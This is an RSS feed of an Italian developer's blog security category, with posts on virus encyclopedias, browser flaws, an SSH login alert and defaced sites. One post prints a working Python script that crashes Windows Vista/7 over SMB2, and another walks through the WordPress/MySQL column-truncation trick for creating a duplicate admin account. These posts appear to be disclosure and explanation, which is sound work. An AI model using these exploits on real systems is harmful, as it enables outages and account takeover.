<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Mi chiamavano... programmatore &#187; Sicurezza</title>
	<atom:link href="http://www.roccatello.it/category/sicurezza/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.roccatello.it</link>
	<description>Sviluppo web, iPhone e GIS 3D @ Rovigo</description>
	<lastBuildDate>Fri, 30 Jul 2010 10:55:07 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>L&#8217;enciclopedia dei virus Symantec</title>
		<link>http://www.roccatello.it/pensieriliberi/enciclopedia-virus-symantec/</link>
		<comments>http://www.roccatello.it/pensieriliberi/enciclopedia-virus-symantec/#comments</comments>
		<pubDate>Thu, 24 Jun 2010 12:50:51 +0000</pubDate>
		<dc:creator>Eduard Roccatello</dc:creator>
				<category><![CDATA[Pensieri liberi]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Tecnologia]]></category>
		<category><![CDATA[antivirus]]></category>
		<category><![CDATA[enciclopedia]]></category>
		<category><![CDATA[lista virus]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://www.roccatello.it/?p=526</guid>
		<description><![CDATA[I virus sono delle creature tecnologiche fantastiche. Si ok, non hanno nulla di buono ma consideratene la &#8220;biologia&#8221;. Piccoli, invisibili (quelli seri) e capaci di replicarsi senza sosta fino ad infettare tutta la rete. Dall&#8217;avvento del Lamer Exterminator (che ti riempiva i dischetti dell&#8217;Amiga con scritto Lamer! ) sono affascinato dai virus e ho decisamente [...]]]></description>
			<content:encoded><![CDATA[<p>I virus sono delle creature tecnologiche fantastiche. Si ok, non hanno nulla di buono ma consideratene la &#8220;biologia&#8221;. Piccoli, invisibili (quelli seri) e capaci di replicarsi senza sosta fino ad infettare tutta la rete.</p>
<p><a href="http://www.roccatello.it/wp-content/uploads/virus.jpg"><img class="alignnone size-full wp-image-527" title="virus" src="http://www.roccatello.it/wp-content/uploads/virus.jpg" alt="" width="350" height="315" /></a></p>
<p>Dall&#8217;avvento del Lamer Exterminator (che ti riempiva i dischetti dell&#8217;Amiga con scritto Lamer! <img src='http://www.roccatello.it/wp-includes/images/smilies/icon_razz.gif' alt=':-P' class='wp-smiley' /> ) sono affascinato dai virus e ho decisamente la mania di leggerne le tecniche e di capire come sfruttare le vulnerabilità. Ce l&#8217;ho nel DNA.</p>
<p>Alcuni antivirus includono l&#8217;elenco dei virus, sfogliabile dall&#8217;utente, ma oggi anche Symantec offre la lista dei virus con scheda tecnica e grado di pericolosità. Una cosa fondamentale per ogni appassionato di sicurezza e di hacking.</p>
<p><a href="http://www.symantec.com/security_response/threatexplorer/azlisting.jsp">Enciclopedia dei virus </a></p>
<img src="http://www.roccatello.it/?ak_action=api_record_view&id=526&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.roccatello.it/pensieriliberi/enciclopedia-virus-symantec/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tornano gli schermi blu da remoto su Windows Vista e 7</title>
		<link>http://www.roccatello.it/sicurezza/tornano-gli-schermi-blu-da-remoto-su-windows-vista-e-7/</link>
		<comments>http://www.roccatello.it/sicurezza/tornano-gli-schermi-blu-da-remoto-su-windows-vista-e-7/#comments</comments>
		<pubDate>Wed, 09 Sep 2009 12:24:51 +0000</pubDate>
		<dc:creator>Eduard Roccatello</dc:creator>
				<category><![CDATA[Programmazione]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Sistemi operativi]]></category>
		<category><![CDATA[Tecnologia]]></category>
		<category><![CDATA[bsod]]></category>

		<guid isPermaLink="false">http://www.roccatello.it/?p=322</guid>
		<description><![CDATA[Bastano poche righe di codice per far crashare i due recenti sistemi operativi Microsoft da remoto. Il nuovo driver che si occupa di gestire il protocollo SMB non gestisce propriamente gli header SAMBA per la funzionalità NEGOTIATE PROTOCOL REQUEST, la prima query SMB inviata dai client al server ed utilizzata per conoscere il protocollo da [...]]]></description>
			<content:encoded><![CDATA[<p>Bastano poche righe di codice per far crashare i due recenti sistemi operativi Microsoft da remoto.</p>
<p>Il nuovo driver che si occupa di gestire il protocollo SMB non gestisce propriamente gli header SAMBA per la funzionalità NEGOTIATE PROTOCOL REQUEST, la prima query SMB inviata dai client al server ed utilizzata per conoscere il protocollo da utilizzare.</p>
<p>Poche righe di python sono sufficienti:</p>
<p><code>#!/usr/bin/python<br />
# When SMB2.0 recieve a "&amp;" char in the "Process Id High" SMB header field it dies with a<br />
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket<br />
from time import sleep</code></p>
<p><code>host = "IP_ADDR", 445<br />
buff = (<br />
"\x00\x00\x00\x90" # Begin SMB header: Session message<br />
"\xff\x53\x4d\x42" # Server Component: SMB<br />
"\x72\x00\x00\x00" # Negociate Protocol<br />
"\x00\x18\x53\xc8" # Operation 0x18 &amp; sub 0xc853<br />
"\x00\x26"# Process ID High: --&gt; <img src='http://www.roccatello.it/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  normal value should be "\x00\x00"<br />
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"<br />
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"<br />
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"<br />
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"<br />
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"<br />
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"<br />
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"<br />
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"<br />
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"<br />
"\x30\x30\x32\x00"<br />
)<br />
s = socket()</code></p>
<p><code>s.connect(host)<br />
s.send(buff)<br />
s.close()</code></p>
<p><a href="http://seclists.org/fulldisclosure/2009/Sep/0039.html">Full disclosure &#8211; Vista and 7 BSOD</a></p>
<img src="http://www.roccatello.it/?ak_action=api_record_view&id=322&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.roccatello.it/sicurezza/tornano-gli-schermi-blu-da-remoto-su-windows-vista-e-7/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Internet Explorer, tutte le versioni vulnerabili?</title>
		<link>http://www.roccatello.it/sicurezza/internet-explorer-tutte-le-versioni-vulnerabili/</link>
		<comments>http://www.roccatello.it/sicurezza/internet-explorer-tutte-le-versioni-vulnerabili/#comments</comments>
		<pubDate>Mon, 15 Dec 2008 12:43:58 +0000</pubDate>
		<dc:creator>Eduard Roccatello</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.roccatello.it/?p=242</guid>
		<description><![CDATA[La vulnerabilità di sicurezza emersa la scorsa settimana in Internet Explorer 7, e già sfruttata in un numero limitato di attacchi, potrebbe avere una portata più ampia di quanto inizialmente congetturato da Microsoft. A dirlo è lo stesso big di Redmond, che con due aggiornamenti al proprio advisory ha aggiunto alle versioni &#8220;potenzialmente&#8221; vulnerabili del [...]]]></description>
			<content:encoded><![CDATA[<p>La vulnerabilità di sicurezza emersa la scorsa settimana in <strong>Internet Explorer 7</strong>, e già sfruttata in un numero limitato di attacchi, potrebbe avere una portata più ampia di quanto inizialmente congetturato da Microsoft. A dirlo è lo stesso big di Redmond, che con due aggiornamenti al proprio advisory ha aggiunto alle versioni &#8220;potenzialmente&#8221; vulnerabili del proprio browser anche le 5.01, 6 e 8 Beta.</p>
<p>via <a href="http://punto-informatico.it/2505832/PI/News/falla-ie-tutte-versioni-vulnerabili.aspx">PI: Falla IE, tutte le versioni vulnerabili?</a>.</p>
<img src="http://www.roccatello.it/?ak_action=api_record_view&id=242&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.roccatello.it/sicurezza/internet-explorer-tutte-le-versioni-vulnerabili/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Analisi vulnerabilità WordPress &#8211; SQL Column Truncation</title>
		<link>http://www.roccatello.it/sicurezza/analisi-vulnerabilita-wordpress-sql-column-truncation/</link>
		<comments>http://www.roccatello.it/sicurezza/analisi-vulnerabilita-wordpress-sql-column-truncation/#comments</comments>
		<pubDate>Tue, 09 Sep 2008 13:03:41 +0000</pubDate>
		<dc:creator>Eduard Roccatello</dc:creator>
				<category><![CDATA[Programmazione]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Sistemi operativi]]></category>
		<category><![CDATA[Tecnologia]]></category>
		<category><![CDATA[Tutorial]]></category>
		<category><![CDATA[mysql]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.roccatello.it/?p=176</guid>
		<description><![CDATA[Pochi giorni fa è stata scoperta una vulnerabilità molto seria nella piattaforma di blogging WordPress. La vulnerabilità è dovuta, oltre ad una mancanza nel codice, ad un problema legato al database in esecuzione per la persistenza dei dati: MySQL. La vulnerabilità è dovuta ad una &#8220;feature&#8221; implementata da MySQL per velocizzare i confronti tra le [...]]]></description>
			<content:encoded><![CDATA[<p>Pochi giorni fa è stata scoperta una vulnerabilità molto seria nella piattaforma di blogging WordPress.<br />
La vulnerabilità è dovuta, oltre ad una mancanza nel codice, ad un problema legato al database in esecuzione per la persistenza dei dati: <strong>MySQL</strong>.</p>
<p>La vulnerabilità è dovuta ad una &#8220;feature&#8221; implementata da MySQL per velocizzare i confronti tra le stringhe e ad una soluzione utilizzata per inserire dati troppo estesi per la dimensione della colonna: il <em><strong>troncamento</strong></em>.<br />
Nella configurazione di default viene solamente emesso un warning, che spesso viene ignorato dalle applicazioni che usano il database e quindi non indicano il possibile problema. Utilizzando la configurazione è possibile <strong>convertire gli avvisi in errori impostando il SQL mode STRICT_ALL_TABLES</strong>, tuttavia questo renderà inutilizzabili quasi tutte le applicazioni web.</p>
<p>Ma vediamo la vulnerabilità&#8230;</p>
<p>Per il confronto tra stringhe l&#8217;impostazione di default di MySQL <strong> non prevede l&#8217;uso della modalità binaria </strong>e quindi del confronto bit a bit. Vengono infatti utilizzate tecniche più rilassate che effettuano l&#8217;operazione di trailing trim sulle stringhe. In pratica scrivere &#8216;software engineer&#8217; e &#8216;software engineer     &#8216; è assolutamente lo stesso in un confronto con le impostazioni predefinite.</p>
<p>Inserire un nuovo utente nel sistema comporta ovviamente la rilevazione di eventuali nomi utente già immessi e quindi una query del genere:</p>
<blockquote><p>SELECT * FROM utente WHERE nomeutente = &#8216;admin   &#8216;;</p></blockquote>
<p>Per il discorso fatto prima il sistema cerca &#8216;admin&#8217; e la query è equivalente a:</p>
<blockquote><p>SELECT * FROM utente WHERE nomeutente = &#8216;admin&#8217;;</p></blockquote>
<p>Ricordiamo però il discorso del troncamento delle stringhe e supponiamo che nomeutente sia di lunghezza massima 8.<br />
Se noi inserissimo il nome utente &#8216;admin   troncami&#8217;, tutti i caratteri che compongono la parola &#8216;troncami&#8217; verrebbero rimossi e la query risulterebbe equivalente a quanto visto.</p>
<p>Facciamo un passo indietro. A<strong>l fine di velocizzare ulteriormente le ricerche su stringhe MySQL controlla prima la lunghezza della stringa inserita con la larghezza della colonna.</strong></p>
<p>Nel nostro caso &#8216;admin   troncami&#8217; ha lunghezza 16 mentre il campo <em>nomeutente </em>è di dimensione 8. Di conseguenza la query di selezione per controllare se il nome utente inserito sia presente non ha successo ed il sistema procede con l&#8217;inserimento.</p>
<p>A questo punto viene eseguita la query di insert:</p>
<blockquote><p>INSERT INTO utente (nomeutente, password) VALUES (&#8216;admin   troncami&#8217;, &#8216;miapassinmd5&#8242;);</p></blockquote>
<p>che però diventa</p>
<blockquote><p>INSERT INTO utente (nomeutente, password) VALUES (&#8216;admin&#8217;, &#8216;miapassinmd5&#8242;);</p></blockquote>
<p><strong>A questo punto ho due utenti admin nel database e posso entrare tranquillamente.<br />
</strong></p>
<img src="http://www.roccatello.it/?ak_action=api_record_view&id=176&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.roccatello.it/sicurezza/analisi-vulnerabilita-wordpress-sql-column-truncation/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Un motivo per non usare Google Chrome</title>
		<link>http://www.roccatello.it/pensieriliberi/un-motivo-per-non-usare-google-chrome/</link>
		<comments>http://www.roccatello.it/pensieriliberi/un-motivo-per-non-usare-google-chrome/#comments</comments>
		<pubDate>Thu, 04 Sep 2008 09:57:04 +0000</pubDate>
		<dc:creator>Eduard Roccatello</dc:creator>
				<category><![CDATA[Pensieri liberi]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Sviluppo software]]></category>
		<category><![CDATA[Tecnologia]]></category>
		<category><![CDATA[browser]]></category>
		<category><![CDATA[google]]></category>

		<guid isPermaLink="false">http://www.roccatello.it/?p=170</guid>
		<description><![CDATA[Google lancia il suo browser per entrare nella disputa IE / Firefox / Safari / Opera e annuncia prestazioni miracolose, nuove idee e sicurezza maggiori (con due vulnerabilità serie dopo poche ore dal rilascio). E&#8217; tutto oro quello che luccica? Direi proprio di no. Ecco una porzione della licenza d&#8217;uso di Google Chrome che potete [...]]]></description>
			<content:encoded><![CDATA[<p>Google lancia il suo browser per entrare nella disputa IE / Firefox / Safari / Opera e annuncia prestazioni miracolose, nuove idee e sicurezza maggiori (con due vulnerabilità serie dopo poche ore dal rilascio).</p>
<p>E&#8217; tutto oro quello che luccica? Direi proprio di no.<br />
Ecco una porzione della licenza d&#8217;uso di Google Chrome che potete leggere all&#8217;indirizzo <a href="http://www.google.com/chrome/eula.html">http://www.google.com/chrome/eula.html</a></p>
<blockquote><p>11.1 L&#8217;utente è proprietario del copyright e di qualsiasi altro diritto già posseduto sui Contenuti inviati, pubblicati o visualizzati su o tramite i Servizi. <strong>Inviando, pubblicando o visualizzando i Contenuti, l&#8217;utente concede a Google una licenza perenne, irrevocabile, internazionale, non soggetta a diritti d&#8217;autore e non esclusiva per riprodurre, adattare, modificare, tradurre, pubblicare, eseguire in pubblico, visualizzare pubblicamente e distribuire qualsiasi Contenuto inviato, pubblicato o visualizzato su o tramite i Servizi. </strong>Detta licenza ha il solo scopo di autorizzare Google a visualizzare, distribuire e promuovere i Servizi e può essere revocata per alcuni Servizi, come definito nei Termini aggiuntivi dei Servizi in oggetto.</p>
<p>11.2 <strong>L&#8217;utente conviene che detta licenza includa un diritto per Google di rendere tali Contenuti disponibili per altre aziende, organizzazioni o altri soggetti con cui Google abbia rapporti</strong> per la fornitura di servizi diffusi e di utilizzare tali Contenuti in relazione alla fornitura di tali servizi.</p></blockquote>
<p>Non so se serva commentare questa cosa. In pratica ogni cosa che fate con Google Chrome può essere usata da Google&#8230;</p>
<p>Alla faccia del <strong>Don&#8217;t Be Evil!</strong> Non usare Google Chrome mi pare l&#8217;unica soluzione <img src='http://www.roccatello.it/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<img src="http://www.roccatello.it/?ak_action=api_record_view&id=170&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.roccatello.it/pensieriliberi/un-motivo-per-non-usare-google-chrome/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Avviso via email al login via SSH (e non)</title>
		<link>http://www.roccatello.it/sviluppo-software/avviso-via-email-al-login-via-ssh-e-non/</link>
		<comments>http://www.roccatello.it/sviluppo-software/avviso-via-email-al-login-via-ssh-e-non/#comments</comments>
		<pubDate>Thu, 17 Apr 2008 11:42:22 +0000</pubDate>
		<dc:creator>Eduard Roccatello</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Sistemi operativi]]></category>
		<category><![CDATA[Sviluppo software]]></category>
		<category><![CDATA[Tecnologia]]></category>
		<category><![CDATA[Tutorial]]></category>
		<category><![CDATA[alert]]></category>
		<category><![CDATA[avviso]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[howto]]></category>
		<category><![CDATA[ssh]]></category>

		<guid isPermaLink="false">http://www.roccatello.it/?p=131</guid>
		<description><![CDATA[Amministrare un server è un&#8217;attività che, per essere ben fatta, necessita di un bel po&#8217; di paranoia. Mantenere una configurazione sicura è infatti piuttosto difficile anche per un amministratore di sistema esperto. Di seguito vi riporto un trucchetto molto utile nel caso rendiate disponibile un servizio SSH magari che utilizzate solo voi per l&#8217;amministrazione del [...]]]></description>
			<content:encoded><![CDATA[<p>Amministrare un server è un&#8217;attività che, per essere ben fatta, necessita di un bel po&#8217; di paranoia. Mantenere una configurazione sicura è infatti piuttosto difficile anche per un amministratore di sistema esperto.</p>
<p>Di seguito vi riporto un trucchetto molto utile nel caso rendiate disponibile un servizio SSH magari che utilizzate solo voi per l&#8217;amministrazione del server.</p>
<p>Non vi riporto consigli banali sulla configurazione sicura di SSH in quanto in rete ci sono risorse molto complete da consultare tuttavia questo consiglio vi potrà rendere più solleciti e tranquilli nei confronti della sicurezza del vostro server.</p>
<p>Vorreste che il vostro server vi notifichi via email di un avvenuto login? Così non appena succede qualcosa di strano o inaspettato siete subito allertati.</p>
<p>Il mio ipotetico server ha l&#8217;utente di root non accessibile via SSH e un solo altro utente con login esterno abilitato.</p>
<p>Aprite vim e puntatelo su /home/utente/.bashrc</p>
<blockquote><p>Ad esempio: $ sudo vim /home/eduard/.bashrc</p></blockquote>
<p>Raggiungete la fine del file con GG ed inserite il comando seguente:</p>
<blockquote><p>echo &#8216;ALERT &#8211; Accesso al server (NomeServer) il:&#8217; `date` `who` | mail -s &#8220;Accesso via SSH di `who | cut -d&#8221;(&#8221; -f2 | cut -d&#8221;)&#8221; -f1`&#8221; vostro@indirizzo.email</p></blockquote>
<p>Abbiate ovviamente cura di sostituire NomeServer e vostro@indirizzo.email con i rispettivi dati <img src='http://www.roccatello.it/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>Salvate il tutto e provate a fare login. In pochi attimi eccovi recapitata la mail <img src='http://www.roccatello.it/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<img src="http://www.roccatello.it/?ak_action=api_record_view&id=131&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.roccatello.it/sviluppo-software/avviso-via-email-al-login-via-ssh-e-non/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Insecurity by design: atto secondo :-)</title>
		<link>http://www.roccatello.it/sicurezza/insecuity-by-design-atto-secondo/</link>
		<comments>http://www.roccatello.it/sicurezza/insecuity-by-design-atto-secondo/#comments</comments>
		<pubDate>Wed, 26 Apr 2006 13:51:35 +0000</pubDate>
		<dc:creator>Eduard Roccatello</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Tecnologia]]></category>

		<guid isPermaLink="false">http://roccatello.devel/2006/04/26/insecuity-by-design-atto-secondo/</guid>
		<description><![CDATA[http://www.universitarovigo.com Hanno ricaricato il sito&#8230; peccato non abbiano sistemato le vulnerabilita&#8217;&#8230; Chissa&#8217; quanto impiegheranno a sistemarlo o forse a bucarlo di nuovo&#8230; ormai e&#8217; noto a tutto il mondo&#8230; PS: Se volete un sito&#8230; spendete qualche euro in piu&#8217; e ricorrete ad un professionista&#8230; di maghi del computer improvvisati ce ne sono un po&#8217; troppi]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.universitarovigo.com">http://www.universitarovigo.com</a></p>
<p>Hanno ricaricato il sito&#8230; peccato non abbiano sistemato le vulnerabilita&#8217;&#8230;<br />
Chissa&#8217; quanto impiegheranno a sistemarlo o forse a bucarlo di nuovo&#8230; ormai e&#8217; noto a tutto il mondo&#8230;</p>
<p>PS: Se volete un sito&#8230; spendete qualche euro in piu&#8217; e ricorrete ad un professionista&#8230; di maghi del computer improvvisati ce ne sono un po&#8217; troppi <img src='http://www.roccatello.it/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> <br />
<a href="http://www.universitarovigo.com" /></p>
<img src="http://www.roccatello.it/?ak_action=api_record_view&id=40&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.roccatello.it/sicurezza/insecuity-by-design-atto-secondo/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>(In)Sicuro by design</title>
		<link>http://www.roccatello.it/sicurezza/insicuro-by-design/</link>
		<comments>http://www.roccatello.it/sicurezza/insicuro-by-design/#comments</comments>
		<pubDate>Mon, 24 Apr 2006 15:23:51 +0000</pubDate>
		<dc:creator>Eduard Roccatello</dc:creator>
				<category><![CDATA[Programmazione]]></category>
		<category><![CDATA[Sicurezza]]></category>

		<guid isPermaLink="false">http://roccatello.devel/2006/04/24/insicuro-by-design/</guid>
		<description><![CDATA[Andate a fare un giretto all&#8217;indirizzo http://www.uniro.it, anzi per comodità vi metto uno screenshot direttamente qua Bella sorpresa vero? Eppure era noto da diverso tempo che il sito era vulnerabile&#8230; ma niente è stato fatto! Io mi chiedo come le istituzioni (perchè per quanto l&#8217;università sia privata è un&#8217;istituzione) possano permettersi di affidare la propria [...]]]></description>
			<content:encoded><![CDATA[<p>Andate a fare un giretto all&#8217;indirizzo <a title="Uniro.it Bucato" href="http://www.uniro.it">http://www.uniro.it</a>, anzi per comodità vi metto uno screenshot direttamente qua</p>
<div style="text-align: center"><img alt="Uniro.it bucato" id="image35" src="http://www.hyperstorm.org/eduard/wp-content/uploads/2006/04/cur_hacked1.jpg" /></div>
<p><strong>Bella sorpresa vero?</strong></p>
<p>Eppure era noto da diverso tempo che il sito era vulnerabile&#8230; ma niente è stato fatto!<br />
Io mi chiedo come le istituzioni (perchè per quanto l&#8217;università sia privata è un&#8217;istituzione) possano permettersi di affidare la propria immagine a dei professionisti improvvisati, senza un minimo di coscienza per quanto riguarda la gestione della sicurezza e i problemi che il web può creare&#8230;</p>
<p>Queste cose possono succedere, ma i disastri annunciati andrebbero almeno evitati! <img src='http://www.roccatello.it/wp-includes/images/smilies/icon_neutral.gif' alt=':-|' class='wp-smiley' /> </p>
<img src="http://www.roccatello.it/?ak_action=api_record_view&id=39&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.roccatello.it/sicurezza/insicuro-by-design/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
